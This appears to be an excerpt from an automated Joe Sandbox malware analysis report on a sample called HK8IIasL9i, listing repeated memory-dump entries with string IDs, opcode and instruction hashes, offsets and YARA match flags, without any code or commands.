                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                        • Opcode ID: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                                                                                                                                                                        • Instruction ID: a5988ab96186a7325d1362fbcccc642df08cbf2eaa279a3d6103cdc8c7b46e1e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7F1F536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: jk
                                                                                                                                                                                                                                                        • API String ID: 0-78326018
                                                                                                                                                                                                                                                        • Opcode ID: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                                                                                                                                                                        • Instruction ID: 68e7885be5d05e4a2cf040f704cbb8fa7a41bea7ef2f0d8a510bf149587bd7f9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DDE1033A618356CBC7188F38DC5126B73E2FF4A351F0AC87DE9818B2A0E779C9558754
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: bC
                                                                                                                                                                                                                                                        • API String ID: 0-3681614764
                                                                                                                                                                                                                                                        • Opcode ID: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                                                                                                                                                                        • Instruction ID: 2fa55bda5e41fd724e566356672d144f9f42af162050902131bcbf15531586af
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9E1C376A28215CFCB08CF28E8905AAB7F2FF8E310F19857DD94697351D734A952CB84
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: {}
                                                                                                                                                                                                                                                        • API String ID: 0-4269290415
                                                                                                                                                                                                                                                        • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                                                                                                                                                                        • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                        • Opcode ID: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                                                                                                                                                                                                                                        • Instruction ID: ccf2f4e9833933b2009195e793b8faf6d5d6e2cba860aec0098ae2c38f35b308
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDD11F72B083255FC714CE25A89076BB7DAAF84350F89892EECA987381D738DD15C7C6
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                        • Opcode ID: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                                                                                                                                                                                                                                        • Instruction ID: 0de6db653e9b938d7b9584f2bb83849907292f7b0c6d1cbe7e897a508e79900e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c49dafb76b3501854f1ecfb32a5253d7c55cb79f5b02df7c17b1cbb688f3955d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AD1E5726083599FD714CE24C4907AFBBD6AFC4311F19862DEC9987281D7B9DD08C792
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: InitializeThunk
• String ID: /,-
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: /,-
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: InitializeThunk
• String ID: VtA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: bC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: 9YB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: .
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: 0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                                        • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                        • Instruction ID: 6611777e2a6ec737545e50a6f622be5064478a673fc50d27cabe9e5aaad848c2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B912637759A900BC31C9E7C4C622A7BA834BD7330B2DC77DA9B2CB3E5D66988054395
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                                                                                                                        • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                        • Instruction ID: 72525c85f477075dffe7e14f80d8e4d34094ebf61648e765f9981e94dfd3314a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88B137711087859FC321DF18C88061BFBE0AFA9704F444A2EF5D997782D675E918CB67
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                                                                                                                        • Opcode ID: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                        • Instruction ID: 9df34bdc8ce9582b6f2791f746cfc2ce65e2bf2f0c0dc3bf3b1492552d7448f8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: af61cab23f3548dae23a0013b9021eac7b62495e940c422da8dd81882780f669
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AB149711083859FD321CF58C98061BFBE0AFA9304F548A2DF5D997742D635EA18CBA7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: gfff
                                                                                                                                                                                                                                                        • API String ID: 0-1553575800
                                                                                                                                                                                                                                                        • Opcode ID: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
                                                                                                                                                                                                                                                        • Instruction ID: c496766fb7d766c5dd5b82cbbd67feda79c32e25a75e7fe7b40cc722f4eac909
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04eae5f35bf542833f546afa72f4753c6069cb9a74afe6c9c0fa956fc9adcb4f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19715872A182518BD328CF28CC95BABBBDAEBD1304F19C53DD481DB295DB789906C781
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                        • Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "
                                                                                                                                                                                                                                                        • API String ID: 0-123907689
                                                                                                                                                                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                        • Instruction ID: efe94809d0a92202c2dc3e29383afe2778aad01ab7e550755d53c844252c5369
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E071C432A083558BD724CE28C48037EB7E2ABC5711F29856DEC949B392D7B9DD4D8742
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: klm
                                                                                                                                                                                                                                                        • API String ID: 0-3800403225
                                                                                                                                                                                                                                                        • Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                                                                                                                                                                                                        • Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
• Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: klm
• API String ID: 0-3800403225
• Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
• Instruction ID: 43ad6f126ededea34ee4b9820373df96626fe4670e998c6dc4dd8f4e550fbb63
• Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
• Instruction Fuzzy Hash: BB51E3B460D3518BD724DF24C45276BB7F2FFA6308F18995CE4D58B290E7398901CB1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: pF
• API String ID: 0-4112324664
• Opcode ID: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
• Instruction ID: 4b15e4364feff8b1cae5d4f97873799dd65533a9f2e3c3f3723fc524ea0f092f
• Opcode Fuzzy Hash: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
• Instruction Fuzzy Hash: 6651C572E442698BDB28CF68D8513DEB7B2FB84304F1581BEC55AEB384CB3449468F81
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: InitializeThunk
• String ID: ?^A
• API String ID: 2994545307-4120214115
• Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
• Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
• Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
• Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: 6B
• API String ID: 0-4127139157
• Opcode ID: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
• Instruction ID: 96ac195b9b02395a12e3507be26d084a31814086cf7b4e33e8fc611c97ddc8d1
• Opcode Fuzzy Hash: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
• Instruction Fuzzy Hash: 90416A79A05102CFE708CF68EC917A9B3B2FF8A311F5A45B8D545E7390CB74A951CB48
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: $%
• API String ID: 0-4214564638
• Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
• Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
• Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
• Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: $%
• API String ID: 0-4214564638
• Opcode ID: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
• Instruction ID: 31c4166c678d426c83f57216c0c3703bb4e8d90860165f1ed85f46721d616914
• Opcode Fuzzy Hash: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
• Instruction Fuzzy Hash: 314110B0D012198BCB10CF98DC917EEB7B1FF49311F088259E845BBB94E7B85946CB51
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,+*)
• API String ID: 0-3529585375
• Opcode ID: d0860ee87a3522d35f46aac91f37c79de7283bf131867904a39b4a27e1383bdc
• Instruction ID: c5cc6125ea18a9a2b6361a3c074cef2e29478061fc7ea760e882697ba84d1b9f
• Opcode Fuzzy Hash: d0860ee87a3522d35f46aac91f37c79de7283bf131867904a39b4a27e1383bdc
• Instruction Fuzzy Hash: B431B639B402159FEB15CF98CC95BBEB7B2BB49300F289128D942B73D0CB75AD018794
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: o`
• API String ID: 0-3993896143
• Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
• Instruction ID: 2913f7276a03bb21acd756a0cdedb757664b50f94c2fcce8625a58dcadd4f70f
• Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
• Instruction Fuzzy Hash: E711E570218380AFC310CF65CDC1B6EBFE29BC2204F65983DE185D7251C679E949DB05
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                                                                                                                                                                                                                                        • Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
                                                                                                                                                                                                                                                        • Instruction ID: 46ead43bd988ad5b99a16a21c2ab1060e4939541d0428d2c05e05470f57672f5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C52E1715083458FCB14CF18C0806AABFE1FF89305F18897EE8996B391D778E949CB89
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 23751e459ccc9bb6a4f1f3a1e8208e8d277617bd75432395b0e424f8c0ad6651
                                                                                                                                                                                                                                                        • Instruction ID: 42a8754500a030df467a19eb208a6b75f213c456a02a9d9f5179d7aa03d033db
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23751e459ccc9bb6a4f1f3a1e8208e8d277617bd75432395b0e424f8c0ad6651
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B952E3B0A08B949FE730CB24C4843A7BBE1AB91314F15483FD5D756BC2C27DB9958B0A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
